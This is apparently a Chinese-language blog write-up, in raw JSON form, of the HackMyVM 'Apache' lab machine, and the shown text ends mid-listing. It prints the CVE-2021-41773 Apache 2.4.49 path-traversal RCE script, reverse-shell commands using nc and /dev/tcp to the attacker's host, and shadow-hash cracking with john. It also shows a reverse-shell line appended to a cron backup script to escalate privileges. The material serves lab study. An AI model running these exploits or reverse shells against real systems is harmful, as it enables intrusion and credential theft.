{"id":592,"date":"2024-04-20T14:11:20","date_gmt":"2024-04-20T06:11:20","guid":{"rendered":"http:\/\/162.14.82.114\/?p=592"},"modified":"2024-04-20T14:11:20","modified_gmt":"2024-04-20T06:11:20","slug":"hmv-_-apache","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/592\/04\/20\/2024\/","title":{"rendered":"hmv[-_-]Apache"},"content":{"rendered":"

Apache<\/h1>\n

\"image-20240420131606425\"<\/div>
\n
\"image-20240420131636902\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 192.168.0.160 -- -A\n\nOpen 192.168.0.160:22\nOpen 192.168.0.160:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 bc:95:83:6e:c4:62:38:b5:a9:94:0c:14:a3:bf:57:34 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDjZp8atO6vRCTGOwqjuGUngbAF\/pL+YzqIobqPQsc\/wnyLRxtduhFvm775wt5E6nrKoeL+EuxO4R3+XAXQq7nRLP9+DcIa03uljeLGGXMRzDQDtz2sQoilqFRn35GCQFiY8mqzEHlGpSptn1aDJLeoyihr\/\/L4UzsT2AH5IqxI234Q0zgbwj2mHRpZTPQM7AbXQxnHOMGgAnT23pJIcjzt5OIvzIZi79hlPbn+CS2VoSq7lSgmQPB8Rp6FwzS92xXNgy4tA+rAKwx8cPdVOxsozZWkJ51gE1QQ5e7WYJz2t2LdCQKXhXZ1GEHniFuSXZwvpp1MPXch\/yCdbAwmWej3G2Dp8ScAnnsSBSh3LXM4VewreIXNSgAI67F1TQgqiRXWGpvHrLtAdGsTAqbZg68S9Mah0UxQXNXzZ5WOp5ZWjNkxTOoZri5AINMPrfin2Tyg1PM3qUEcY0ANQu+UUSIKVnJcDeOy2cd3RfZ3cikzfEfu0sc9B1ijp6K0m5hOtB8=\n|   256 07:fa:46:1a:ca:f3:dc:08:2f:72:8c:e2:f2:2e:32:e5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLlz0auLlfftjw5PJX6I+LJqXUfVgWqSmETd5Ts1LJLEVBrMTX4wXnWmTSOgcy8sSA0E1jTbKReY5ejsYU9INnI=\n|   256 46:ff:72:d5:67:c5:1f:87:b1:35:84:29:f3:ad:e8:3a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe1GYTzyP9hWtrRQ0N29auVmnYHAmOYD0RtKhy4uv4U\n80\/tcp open  http    syn-ack Apache httpd 2.4.49 ((Unix))\n|_http-favicon: Unknown favicon MD5: EB49C4A639D3960EE7DDD07BC9F832B7\n| http-methods: \n|   Supported Methods: POST OPTIONS HEAD GET TRACE\n|_  Potentially risky methods: TRACE\n|_http-server-header: Apache\/2.4.49 (Unix)\n| http-robots.txt: 1 disallowed entry \n|_\/\n|_http-title: Apaches\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.160\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.160\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,git,jpg,txt,png,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/images               (Status: 301) [Size: 236] [--> http:\/\/192.168.0.160\/images\/]\n\/css                  (Status: 301) [Size: 233] [--> http:\/\/192.168.0.160\/css\/]\n\/js                   (Status: 301) [Size: 232] [--> http:\/\/192.168.0.160\/js\/]\n\/robots.txt           (Status: 200) [Size: 116]\n\/fonts                (Status: 301) [Size: 235] [--> http:\/\/192.168.0.160\/fonts\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240420131854939\"<\/div><\/p>\n
\u54c7\u585e\uff0c\u5c45\u7136\u662funix\u7684\uff01<\/p>\n
\u5230\u5904\u7ffb\u7ffb\uff1a<\/p>\n
\"image-20240420132229586\"<\/div><\/p>\n
\u56db\u4e2a\u7528\u6237<\/p>\n
Geronimo\nSacagawea\nSquanto \nPocahontas<\/code><\/pre>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
http:\/\/192.168.0.160\/robots.txt<\/code><\/pre>\n
User-agent: *\nDisallow: \/\n\n# IOKAnFlvdSBrbm93IHlvdXIgcGF0aCwgY2hpbGQsIG5vdyBmb2xsb3cgaXQu4oCdCi0tIFBvY2Fob250YXMg<\/code><\/pre>\n
\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
From_Base64('A-Za-z0-9+\/=',true,false)\n \u00e2\u0080\u009cYou know your path, child, now follow it.\u00e2\u0080\u009d\n-- Pocahontas <\/code><\/pre>\n
\u5f97\u5230\u4e00\u4e2a\u7528\u6237\uff1apocahontas<\/code>\u3002<\/p>\n
\u5bfb\u627e\u6f0f\u6d1e<\/h3>\n
\u76f4\u63a5\u627eapache\u6f0f\u6d1e\u8bd5\u8bd5\uff0c\u9898\u76ee\u611f\u89c9\u662f\u8fd9\u4e2a\u610f\u601d\uff1a<\/p>\n
\"image-20240420132521478\"<\/div><\/p>\n
\u627e\u5230\u4e00\u4e2aRCE\u6f0f\u6d1e\uff01\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ searchsploit -m multiple\/webapps\/50383.sh\n  Exploit: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)\n      URL: https:\/\/www.exploit-db.com\/exploits\/50383\n     Path: \/usr\/share\/exploitdb\/exploits\/multiple\/webapps\/50383.sh\n    Codes: CVE-2021-41773\n Verified: True\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/apache\/50383.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ cat 50383.sh \n# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)\n# Date: 10\/05\/2021\n# Exploit Author: Lucas Souza https:\/\/lsass.io\n# Vendor Homepage:  https:\/\/apache.org\/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!\/bin\/bash\n\nif [[ $1 == '' ]]; [[ $2 == '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho .\/PoC.sh targets.txt \/etc\/passwd\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d "echo Content-Type: text\/plain; echo; $3" "$host\/cgi-bin\/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e$2"; done\n\n# PoC.sh targets.txt \/etc\/passwd\n# PoC.sh targets.txt \/bin\/sh whoami                                                                                                                                                        \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ echo '192.168.0.160' > targets.txt       \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ 50383.sh targets.txt \/bin\/bash whoami\n50383.sh: command not found\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ ls\n50383.sh  targets.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash whoami\n192.168.0.160\ndaemon\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash 'nc -e \/bin\/bash 192.168.0.143 1234'\n192.168.0.160\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash 'bash -c 'exec bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1''\nzsh: no such file or directory: \/dev\/tcp\/192.168.0.143\/1234\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash 'bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1"'\n192.168.0.160<\/code><\/pre>\n
\u6210\u529f\uff01<\/p>\n
\"image-20240420133004011\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) daemon@apaches:\/usr\/bin$ cd \/home\n(remote) daemon@apaches:\/home$ ls -la\ntotal 24\ndrwxr-xr-x  6 root       root       4096 Oct  9  2022 .\ndrwxr-xr-x 20 root       root       4096 Sep 30  2022 ..\ndrwxr-xr-x  4 geronimo   geronimo   4096 Jul 13  2023 geronimo\ndrwxr-xr-x  3 pocahontas pocahontas 4096 Oct 10  2022 pocahontas\ndrwxr-xr-x  6 sacagawea  sacagawea  4096 Jul 13  2023 sacagawea\ndrwxr-xr-x  4 squanto    squanto    4096 Oct 10  2022 squanto\n(remote) daemon@apaches:\/home$ cd geronimo\/\n(remote) daemon@apaches:\/home\/geronimo$ ls -la\ntotal 32\ndrwxr-xr-x 4 geronimo geronimo 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root     root     4096 Oct  9  2022 ..\n-rw------- 1 geronimo geronimo    0 Jul 13  2023 .bash_history\n-rw-r--r-- 1 geronimo geronimo  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 geronimo geronimo 3771 Feb 25  2020 .bashrc\ndrwx------ 2 geronimo geronimo 4096 Sep 30  2022 .cache\ndrwxrwxr-x 3 geronimo geronimo 4096 Oct 10  2022 .local\n-rw-r--r-- 1 geronimo geronimo  807 Feb 25  2020 .profile\n-rw-r--r-- 1 geronimo geronimo    0 Oct  1  2022 .sudo_as_admin_successful\n-rw------- 1 geronimo geronimo 3827 Oct 10  2022 user.txt\n(remote) daemon@apaches:\/home\/geronimo$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:111:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\ngeronimo:x:1000:1000:geronimo:\/home\/geronimo:\/bin\/bash\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nsquanto:x:1001:1001:,,,:\/home\/squanto:\/bin\/bash\nsacagawea:x:1002:1002:,,,:\/home\/sacagawea:\/bin\/bash\npocahontas:x:1003:1003:,,,:\/home\/pocahontas:\/bin\/bash\n(remote) daemon@apaches:\/home\/geronimo$ cd ..\/\n(remote) daemon@apaches:\/home$ ls -la\ntotal 24\ndrwxr-xr-x  6 root       root       4096 Oct  9  2022 .\ndrwxr-xr-x 20 root       root       4096 Sep 30  2022 ..\ndrwxr-xr-x  4 geronimo   geronimo   4096 Jul 13  2023 geronimo\ndrwxr-xr-x  3 pocahontas pocahontas 4096 Oct 10  2022 pocahontas\ndrwxr-xr-x  6 sacagawea  sacagawea  4096 Jul 13  2023 sacagawea\ndrwxr-xr-x  4 squanto    squanto    4096 Oct 10  2022 squanto\n(remote) daemon@apaches:\/home$ cd pocahontas\/\n(remote) daemon@apaches:\/home\/pocahontas$ ls -la\ntotal 36\ndrwxr-xr-x 3 pocahontas pocahontas  4096 Oct 10  2022 .\ndrwxr-xr-x 6 root       root        4096 Oct  9  2022 ..\n-rw------- 1 pocahontas pocahontas     0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 pocahontas pocahontas   220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 pocahontas pocahontas  3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 3 pocahontas pocahontas  4096 Oct 10  2022 .local\n-rw-r--r-- 1 pocahontas pocahontas   807 Oct  9  2022 .profile\n-rw------- 1 pocahontas pocahontas 10267 Oct 10  2022 user.txt\n(remote) daemon@apaches:\/home\/pocahontas$ cd ..\/        \n(remote) daemon@apaches:\/home$ cd sacagawea\/\n(remote) daemon@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Apr 20 05:30 Backup\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) daemon@apaches:\/home\/sacagawea$ cd Backup\/\n(remote) daemon@apaches:\/home\/sacagawea\/Backup$ ls -la\ntotal 23128\ndrwxrwxr-x 2 sacagawea sacagawea     4096 Apr 20 05:32 .\ndrwxr-xr-x 6 sacagawea sacagawea     4096 Jul 13  2023 ..\n-rwx------ 1 sacagawea sacagawea 23673389 Apr 20 05:32 Backup.tar.gz\n(remote) daemon@apaches:\/home\/sacagawea\/Backup$ tar -zxvf Backup.tar.gz -o \/tmp\/\ntar (child): Backup.tar.gz: Cannot open: Permission denied\ntar (child): Error is not recoverable: exiting now\ntar: Child returned status 2\ntar: Error is not recoverable: exiting now\n(remote) daemon@apaches:\/home\/sacagawea\/Backup$ cd ..\n(remote) daemon@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Apr 20 05:32 Backup\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) daemon@apaches:\/home\/sacagawea$ sudo -l\n[sudo] password for daemon:<\/code><\/pre>\n
\u591a\u756a\u5c1d\u8bd5\u65e0\u679c\uff0c\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\uff1a<\/p>\n
\"image-20240420133756701\"<\/div><\/p>\n
\u554a\uff0c\u8fd9\u4e2ashadow\u5c45\u7136\u53ef\u8bfb\u3002\u3002\u3002<\/p>\n
hash\u7206\u7834<\/h3>\n
\u641e\u5230\u672c\u5730\u6765\u8fdb\u884c\u7834\u89e3\u8bd5\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\niamtheone        (squanto)    <\/code><\/pre>\n
\u5f97\u5230\u4e00\u4e2a\u7528\u6237\uff0c\u5c1d\u8bd5ssh\u8fde\u63a5\uff01<\/p>\n
\"image-20240420134134599\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ ssh squanto@192.168.0.160\nThe authenticity of host '192.168.0.160 (192.168.0.160)' can't be established.\nED25519 key fingerprint is SHA256:Rh8fFW5oIyfLABNlGvG850s8cm8NdtrTuTNfdvGyMuY.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.160' (ED25519) to the list of known hosts.\nsquanto@192.168.0.160's password: \nWelcome to Ubuntu 20.04 LTS (GNU\/Linux 5.4.0-128-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sat 20 Apr 2024 05:40:39 AM UTC\n\n  System load:  0.01               Processes:               127\n  Usage of \/:   22.5% of 39.07GB   Users logged in:         0\n  Memory usage: 22%                IPv4 address for enp0s3: 192.168.0.160\n  Swap usage:   0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\n143 updates can be installed immediately.\n2 of these updates are security updates.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nsquanto@apaches:~$<\/code><\/pre>\n
\u8fde\u4e0a\u4e86\uff01<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h4>\n
squanto@apaches:~$ ls -la\ntotal 40\ndrwxr-xr-x 5 squanto squanto 4096 Apr 20 05:40 .\ndrwxr-xr-x 6 root    root    4096 Oct  9  2022 ..\ndrwxrwxr-x 2 squanto squanto 4096 Oct 10  2022 backup\n-rw------- 1 squanto squanto    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 squanto squanto  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 squanto squanto 3771 Oct  9  2022 .bashrc\ndrwx------ 2 squanto squanto 4096 Apr 20 05:40 .cache\ndrwxrwxr-x 3 squanto squanto 4096 Oct  9  2022 .local\n-rw-r--r-- 1 squanto squanto  807 Oct  9  2022 .profile\n-rw-rw-r-- 1 squanto squanto  156 Oct 10  2022 todo.md\n-rw------- 1 squanto squanto 2070 Oct  9  2022 user.txt\nsquanto@apaches:~$ cat user.txt \n  ______ _                      __                               _        \n |  ____| |                    \/ _|                             | |       \n | |__  | | __ _  __ _    ___ | |_   ___  __ _ _   _  __ _ _ __ | |_ ___  \n |  __| | |\/ _` |\/ _` |  \/ _ \\|  _| \/ __|\/ _` | | | |\/ _` | '_ \\| __\/ _ \\ \n | |    | | (_| | (_| | | (_) | |   \\__ \\ (_| | |_| | (_| | | | | || (_) |\n |_|    |_|\\__,_|\\__, |  \\___\/|_|   |___\/\\__, |\\__,_|\\__,_|_| |_|\\__\\___\/ \n                  __\/ |                     | |                           \n                 |___\/                      |_|                           \n@@@@@@@@&@&@@&&@&&&&&&&&&&&&&&&&&&&&&&%&%#%%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@&@&@&@&@&&&&&&&&&&&&&&&&&&&&&&&&&&#%%%%&&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%#(%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@&&&@&@&&&&&&&&&&&&&&&&&&&&&&&&&&#((#%#&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@&@&&&&&&&&&&&&&&&&&&&&&&&%((\/\/..(*,\/,,*.%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@&@@&&&&&&&&&&&&&&&&&&&&&&&##%#(\/&&&&&%#\/\/,    &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@@&&&&&&&&&&&&&&&&&&((((*&&&%&%%#%((\/((  .\/&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@&@&&&&&&&&&&&&&&&&%(((\/\/&&&&&#\/#(\/*\/\/(\/(  ..&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@@&&&&&&&&&&&&&&&&#(\/\/%%&&*..\/%(,.*. .(\/(  ..&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@&&&&&&&@&&&&&&&&&&\/\/*(&&%%#\/#%&&\/\/**(\/\/(\/\/  .&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@@@@@&@&&&&&&&&&&(,,*&@&&&&&%%&&(\/,((((\/\/(   \/&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@&&&&&&&&&&&&&&&&&(.  ##%&&\/&&(#*,. \/,\/\/\/\/\/   &&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@&&&&&&&&&&&&&&&&&,  %##%%&&&\/**.,**\/\/(\/\/\/,#&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@@&&@&&&&&&&&&&&&&&(,\/%%%&&&&&%((**\/\/*\/(\/  \/&&&&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@&&@@@&@&&&&&&&&&&&&%*,.#%#&&&#*\/\/\/\/**.     .%&&&&&&&&&&&&&&&&&&&@&&&&&\n@@@@@@@@@@@&@&@&@&&&&&&&&&&%#&** \/%#\/*,(..,..       ...*&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@@@&@@@&@@&&&&&&&&@@&#\/.**%&%##(*,.    ..   .,\/\/&&&&&&&&&&&&&&&&&&&&&&&&\n@@@@@@@@@&@&@&@&@@&&@@&&@&&&%( %%(&%&%#((%%**@*,.,.,,\/\/,&&&&&&@&&@&&&&&&&&&&&&&&\n\nWell done!\nsquanto@apaches:~$ cat todo.md \n### Development\n\n- [x] Apaches frontpage\n- [ ] Portal for administration\n- [ ] Database selection for administration\n- [ ] Hardening the system for attacks\nsquanto@apaches:~$ sudo -l\n[sudo] password for squanto: \nSorry, user squanto may not run sudo on apaches.\nsquanto@apaches:~$ cd backup\/\nsquanto@apaches:~\/backup$ ls -la\ntotal 8\ndrwxrwxr-x 2 squanto squanto 4096 Oct 10  2022 .\ndrwxr-xr-x 5 squanto squanto 4096 Apr 20 05:40 ..\nsquanto@apaches:~\/backup$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n\n#* 5 * * * * su sacagawea -c ".\/home\/sacagawea\/Scripts\/backup.sh"\ncat: \/etc\/cron.weekly: Is a directory<\/code><\/pre>\n
\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743<\/h3>\n
\u5148\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\uff1a<\/p>\n
squanto@apaches:~\/backup$ cat \/home\/sacagawea\/Scripts\/backup.sh\n#!\/bin\/bash\n\nrm -rf \/home\/sacagawea\/Backup\/Backup.tar.gz\ntar -czvf \/home\/sacagawea\/Backup\/Backup.tar.gz \/usr\/local\/apache2.4.49\/htdocs\nchmod 700 \/home\/sacagawea\/Backup\/Backup.tar.gz\nsquanto@apaches:~\/backup$ ls -l \/home\/sacagawea\/Scripts\/backup.sh\n-rwxrwx--- 1 sacagawea Lipan 182 Oct 10  2022 \/home\/sacagawea\/Scripts\/backup.sh<\/code><\/pre>\n
\u662f\u4e00\u4e2a\u5907\u4efd\u7a0b\u5e8f\uff0c\u5c1d\u8bd5\u6dfb\u52a0\u53cd\u5f39shell\u7136\u540e\u8fd0\u884c\uff1a<\/p>\n
echo '\/bin\/bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1' >> \/home\/sacagawea\/Scripts\/backup.sh<\/code><\/pre>\n
\u7136\u540e\u5f39\u8fc7\u6765\u4e86\uff1a<\/p>\n
\"image-20240420134824580\"<\/div><\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h4>\n
(remote) sacagawea@apaches:\/home\/sacagawea$ whoami;id\nsacagawea\nuid=1002(sacagawea) gid=1002(sacagawea) groups=1002(sacagawea),1004(Lipan)\n(remote) sacagawea@apaches:\/home\/sacagawea$ sudo -l\n[sudo] password for sacagawea: \n(remote) sacagawea@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Apr 20 05:48 Backup\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 3 sacagawea sacagawea 4096 